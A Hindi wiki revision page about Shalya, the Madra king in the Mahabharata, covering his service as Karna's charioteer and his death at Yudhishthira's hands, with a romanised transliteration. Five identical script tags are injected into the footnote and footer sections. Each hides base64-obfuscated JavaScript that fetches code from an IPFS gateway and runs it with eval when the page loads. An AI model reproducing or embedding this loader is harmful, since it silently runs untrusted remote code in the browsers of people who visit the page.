Difference between revisions of "शल्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(12 intermediate revisions by 5 users not shown)
Line 1: Line 1:
==शल्य / Shalya==
 
 
*शल्य, मद्रराज महारथी था।  
 
*शल्य, मद्रराज महारथी था।  
 
*[[पांडव|पांडवों]] ने [[माद्री]] के भाई, मामा शल्य को युद्ध में सहायतार्थ आमन्त्रित किया। शल्य अपनी विशाल सेना के साथ पांडवों की ओर जा रहा था। मार्ग में [[दुर्योधन]] ने उन सबका अतिथि-सत्कार कर उन्हें प्रसन्न किया। शल्य ने [[महाभारत]]-युद्ध में सक्रिय भाग लिया।  
 
*[[पांडव|पांडवों]] ने [[माद्री]] के भाई, मामा शल्य को युद्ध में सहायतार्थ आमन्त्रित किया। शल्य अपनी विशाल सेना के साथ पांडवों की ओर जा रहा था। मार्ग में [[दुर्योधन]] ने उन सबका अतिथि-सत्कार कर उन्हें प्रसन्न किया। शल्य ने [[महाभारत]]-युद्ध में सक्रिय भाग लिया।  
 
*[[कर्ण]] के सेनापतित्व ग्रहण करने के उपरांत उसकी सलाह से दुर्योधन ने शल्य से कर्ण का सारथी बनने की प्रार्थना की। उसे यह प्रस्ताव अपमानजनक लगा, अत: वह दुर्योधन की सभा से उठकर जाने लगा। दुर्योधन ने बहुत समझा-बुझाकर तथा उसे श्री[[कृष्ण]] से भी श्रेयस्कर बताकर सारथी का कार्यभार उठाने के लिए तैयार कर लिया। शल्य ने यथावत समाचार पांडवों को दिया तो [[युधिष्ठिर]] ने मामा शल्य से कहा-'[[कौरव|कौरवों]] की ओर से कर्ण के युद्ध करने पर निश्चय ही आप सारथी होंगे। आप हमारा यही भला कर सकते हैं कि कर्ण का उत्साह भंग करते रहें।' शल्य ने यह प्रस्ताव स्वीकार कर लिया। कर्ण का सारथी बनते समय शल्य ने यह शर्त दुर्योधन के सम्मुख रखी थी कि उसे स्वेच्छा से बोलने की छूट रहेगी, चाहे वह कर्ण को भला लगे या बुरा। दुर्योधन तथा कर्ण आदि ने शर्त स्वीकार कर ली।  
 
*[[कर्ण]] के सेनापतित्व ग्रहण करने के उपरांत उसकी सलाह से दुर्योधन ने शल्य से कर्ण का सारथी बनने की प्रार्थना की। उसे यह प्रस्ताव अपमानजनक लगा, अत: वह दुर्योधन की सभा से उठकर जाने लगा। दुर्योधन ने बहुत समझा-बुझाकर तथा उसे श्री[[कृष्ण]] से भी श्रेयस्कर बताकर सारथी का कार्यभार उठाने के लिए तैयार कर लिया। शल्य ने यथावत समाचार पांडवों को दिया तो [[युधिष्ठिर]] ने मामा शल्य से कहा-'[[कौरव|कौरवों]] की ओर से कर्ण के युद्ध करने पर निश्चय ही आप सारथी होंगे। आप हमारा यही भला कर सकते हैं कि कर्ण का उत्साह भंग करते रहें।' शल्य ने यह प्रस्ताव स्वीकार कर लिया। कर्ण का सारथी बनते समय शल्य ने यह शर्त दुर्योधन के सम्मुख रखी थी कि उसे स्वेच्छा से बोलने की छूट रहेगी, चाहे वह कर्ण को भला लगे या बुरा। दुर्योधन तथा कर्ण आदि ने शर्त स्वीकार कर ली।  
 
*कर्ण स्वभाव से दंभी था। वह जब भी आत्मप्रशंसा करता, शल्य उसका परिहास करने लगता तथा पांडवों की प्रशंसा कर उसे हतोत्साहित करता रहता।  
 
*कर्ण स्वभाव से दंभी था। वह जब भी आत्मप्रशंसा करता, शल्य उसका परिहास करने लगता तथा पांडवों की प्रशंसा कर उसे हतोत्साहित करता रहता।  
*शल्य ने एक कथा भी सुनायी कि एक बार वैश्य परिवार की जूठन पर पलने वाला एक गर्वीला कौआ राजहंसों को अपने सम्मुख कुछ समझता ही नहीं था। एक बार एक हंस से उसने उड़ने की होड़ लगायी और बोला कि वह सौ प्रकार से उड़ना जानता है। होड़ में लंबी उड़ान लेते हुए वह थक कर महासागर में गिर गया। राजहंस ने प्राणों की भीख मांगते हुए कौए को सागर से बाहर निकाल अपनी पीठ पर लादकर उसके देश तक पहुंचा दिया। शल्य बोला-'इसी प्रकार कर्ण, तुम भी कौरवों की भीख पर पलकर घंमडी होते जा रहे हो।' कर्ण बहुत रुष्ट हुआ, पर युद्ध पूर्ववत चलता रहा।  
+
*शल्य ने एक कथा भी सुनायी कि एक बार वैश्य परिवार की जूठन पर पलने वाला एक गर्वीला [[कौआ]] राजहंसों को अपने सम्मुख कुछ समझता ही नहीं था। एक बार एक हंस से उसने उड़ने की होड़ लगायी और बोला कि वह सौ प्रकार से उड़ना जानता है। होड़ में लंबी उड़ान लेते हुए वह थक कर महासागर में गिर गया। राजहंस ने प्राणों की भीख मांगते हुए कौए को सागर से बाहर निकाल अपनी पीठ पर लादकर उसके देश तक पहुंचा दिया। शल्य बोला-'इसी प्रकार कर्ण, तुम भी कौरवों की भीख पर पलकर घंमडी होते जा रहे हो।' कर्ण बहुत रुष्ट हुआ, पर युद्ध पूर्ववत चलता रहा।  
*कर्ण-वध के उपरांत कौरवों ने [[अश्वत्थामा]] के कहने से शल्य को सेनापति बनाया। श्रीकृष्ण ने युधिष्ठिर को शल्य-वध के लिए उत्साहित करते हुए कहा कि इस समय यह बात भूल जानी चाहिए कि वह पांडवों का मामा है। कौरवों ने परस्पर विचार कर यह नियम बनाया कि कोई भी एक योद्धा अकेला पांडवों से युद्ध नहीं करेगा। शल्य का प्रत्येक पांडव से युद्ध हुआ। कभी वह पराजित हुआ, कभी पांडवगण। अंत में युधिष्ठिर ने उस पर शक्ति से प्रहार किया। उसके वधोपरांत उसका भाई, जो कि शल्य के समान ही तेजस्वी था, युधिष्ठिर से युद्ध करने आया और उन्हीं के हाथों मारा गया। दुर्योधन ने अपने योद्धाओं को बहुत कोसा कि जब यह निश्चित हो गया था कि कोई भी अकेला योद्धा शत्रुओं से लड़ने नहीं जायेगा, शल्य पांडवों की ओर क्यों बढ़ा? इसी कारण दोनों भाई मारे गये।<balloon title="महाभारत, उद्योगपर्व, 8।, कर्णपर्व, 32।, शल्यपर्व, 5-8।11-18" style="color:blue">*</balloon>  
+
*कर्ण-वध के उपरांत कौरवों ने [[अश्वत्थामा]] के कहने से शल्य को सेनापति बनाया। श्रीकृष्ण ने युधिष्ठिर को शल्य-वध के लिए उत्साहित करते हुए कहा कि इस समय यह बात भूल जानी चाहिए कि वह पांडवों का मामा है। कौरवों ने परस्पर विचार कर यह नियम बनाया कि कोई भी एक योद्धा अकेला पांडवों से युद्ध नहीं करेगा। शल्य का प्रत्येक पांडव से युद्ध हुआ। कभी वह पराजित हुआ, कभी पांडवगण। अंत में युधिष्ठिर ने उस पर शक्ति से प्रहार किया। उसके वधोपरांत उसका भाई, जो कि शल्य के समान ही तेजस्वी था, युधिष्ठिर से युद्ध करने आया और उन्हीं के हाथों मारा गया। दुर्योधन ने अपने योद्धाओं को बहुत कोसा कि जब यह निश्चित हो गया था कि कोई भी अकेला योद्धा शत्रुओं से लड़ने नहीं जायेगा, शल्य पांडवों की ओर क्यों बढ़ा? इसी कारण दोनों भाई मारे गये।<ref>महाभारत, उद्योगपर्व, 8।, कर्णपर्व, 32।, शल्यपर्व, 5-8।11-18</ref>  
+
{{seealso|शल्य संदर्भ}}
  
==अन्य लिंक==
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==संबंधित लेख==
 
{{महाभारत}}
 
{{महाभारत}}
{{महाभारत2}}
 
 
[[Category:पौराणिक कोश]]
 
[[Category:पौराणिक कोश]]
 
[[Category:महाभारत]]
 
[[Category:महाभारत]]
 +
[[Category:प्रसिद्ध चरित्र और मिथक कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:00, 14 May 2016

  • shaly, madraraj maharathi tha.
  • paandavoan ne madri ke bhaee, mama shaly ko yuddh mean sahayatarth amantrit kiya. shaly apani vishal sena ke sath paandavoan ki or ja raha tha. marg mean duryodhan ne un sabaka atithi-satkar kar unhean prasann kiya. shaly ne mahabharat-yuddh mean sakriy bhag liya.
  • karn ke senapatitv grahan karane ke uparaant usaki salah se duryodhan ne shaly se karn ka sarathi banane ki prarthana ki. use yah prastav apamanajanak laga, at: vah duryodhan ki sabha se uthakar jane laga. duryodhan ne bahut samajha-bujhakar tatha use shrikrishna se bhi shreyaskar batakar sarathi ka karyabhar uthane ke lie taiyar kar liya. shaly ne yathavat samachar paandavoan ko diya to yudhishthir ne mama shaly se kaha-'kauravoan ki or se karn ke yuddh karane par nishchay hi ap sarathi hoange. ap hamara yahi bhala kar sakate haian ki karn ka utsah bhang karate rahean.' shaly ne yah prastav svikar kar liya. karn ka sarathi banate samay shaly ne yah shart duryodhan ke sammukh rakhi thi ki use svechchha se bolane ki chhoot rahegi, chahe vah karn ko bhala lage ya bura. duryodhan tatha karn adi ne shart svikar kar li.
  • karn svabhav se danbhi tha. vah jab bhi atmaprashansa karata, shaly usaka parihas karane lagata tatha paandavoan ki prashansa kar use hatotsahit karata rahata.
  • shaly ne ek katha bhi sunayi ki ek bar vaishy parivar ki joothan par palane vala ek garvila kaua rajahansoan ko apane sammukh kuchh samajhata hi nahian tha. ek bar ek hans se usane u dane ki ho d lagayi aur bola ki vah sau prakar se u dana janata hai. ho d mean lanbi u dan lete hue vah thak kar mahasagar mean gir gaya. rajahans ne pranoan ki bhikh maangate hue kaue ko sagar se bahar nikal apani pith par ladakar usake desh tak pahuancha diya. shaly bola-'isi prakar karn, tum bhi kauravoan ki bhikh par palakar ghanmadi hote ja rahe ho.' karn bahut rusht hua, par yuddh poorvavat chalata raha.
  • karn-vadh ke uparaant kauravoan ne ashvatthama ke kahane se shaly ko senapati banaya. shrikrishna ne yudhishthir ko shaly-vadh ke lie utsahit karate hue kaha ki is samay yah bat bhool jani chahie ki vah paandavoan ka mama hai. kauravoan ne paraspar vichar kar yah niyam banaya ki koee bhi ek yoddha akela paandavoan se yuddh nahian karega. shaly ka pratyek paandav se yuddh hua. kabhi vah parajit hua, kabhi paandavagan. aant mean yudhishthir ne us par shakti se prahar kiya. usake vadhoparaant usaka bhaee, jo ki shaly ke saman hi tejasvi tha, yudhishthir se yuddh karane aya aur unhian ke hathoan mara gaya. duryodhan ne apane yoddhaoan ko bahut kosa ki jab yah nishchit ho gaya tha ki koee bhi akela yoddha shatruoan se l dane nahian jayega, shaly paandavoan ki or kyoan badha? isi karan donoan bhaee mare gaye.[1]
  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. mahabharat, udyogaparv, 8., karnaparv, 32., shalyaparv, 5-8.11-18

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>